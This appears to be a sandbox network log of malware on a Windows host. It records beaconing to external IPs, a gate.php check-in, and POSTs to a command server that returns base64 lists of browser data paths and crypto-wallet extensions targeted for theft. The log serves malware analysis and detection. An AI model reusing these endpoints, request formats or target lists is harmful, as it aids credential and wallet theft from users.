Dec 12, 2024 16:49:09.066426039 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:08 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:11.490015030 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:11.982053041 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:11 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:14.240731955 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:14.732685089 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:14 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:16.971389055 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:17.461582899 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:17 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:19.718420029 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:20.293880939 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:22.478904009 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:22.980348110 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:22 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:26.519911051 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:27.010283947 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:26 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:29.391504049 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:29.879004002 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:32.257066965 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:32.746566057 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:34.843843937 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:35.337614059 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:35 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:37.433306932 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:37.953541994 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:37 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	50021	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:05.087802887 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:05.207591057 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:06.857609987 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	50024	185.215.113.206	80	7020	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:05.760761023 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:07.093167067 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 12, 2024 16:49:07.265218019 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"stok------FCGIJDBAFCBAAKECGDGC--
Dec 12, 2024 16:49:07.719496012 CET	407	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:07 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 47 4e 6b 59 57 59 78 4e 44 42 6b 4e 54 5a 68 59 6a 6b 30 4e 47 4d 32 4f 44 45 32 5a 47 45 32 59 6d 51 7a 4e 32 59 7a 4f 44 5a 6b 4d 47 49 35 59 6a 67 79 5a 6a 63 32 4d 54 59 77 4e 44 52 6b 4f 54 5a 6a 59 54 45 31 4d 7a 59 31 4e 44 41 32 5a 54 52 6a 4e 6a 55 78 59 57 45 7a 5a 44 51 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZGNkYWYxNDBkNTZhYjk0NGM2ODE2ZGE2YmQzN2YzODZkMGI5YjgyZjc2MTYwNDRkOTZjYTE1MzY1NDA2ZTRjNjUxYWEzZDQ3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 12, 2024 16:49:07.806503057 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJK Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"browsers------HDAFBAEBKJKFIDHJJKJK--
Dec 12, 2024 16:49:08.247930050 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 12, 2024 16:49:08.247958899 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 12, 2024 16:49:08.581809044 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHI Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"plugins------KJECFHCBKKEBAKFIJDHI--
Dec 12, 2024 16:49:09.021327019 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 12, 2024 16:49:09.021399021 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 12, 2024 16:49:09.021409988 CET	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 12, 2024 16:49:09.021642923 CET	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Dec 12, 2024 16:49:09.021662951 CET	1236	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
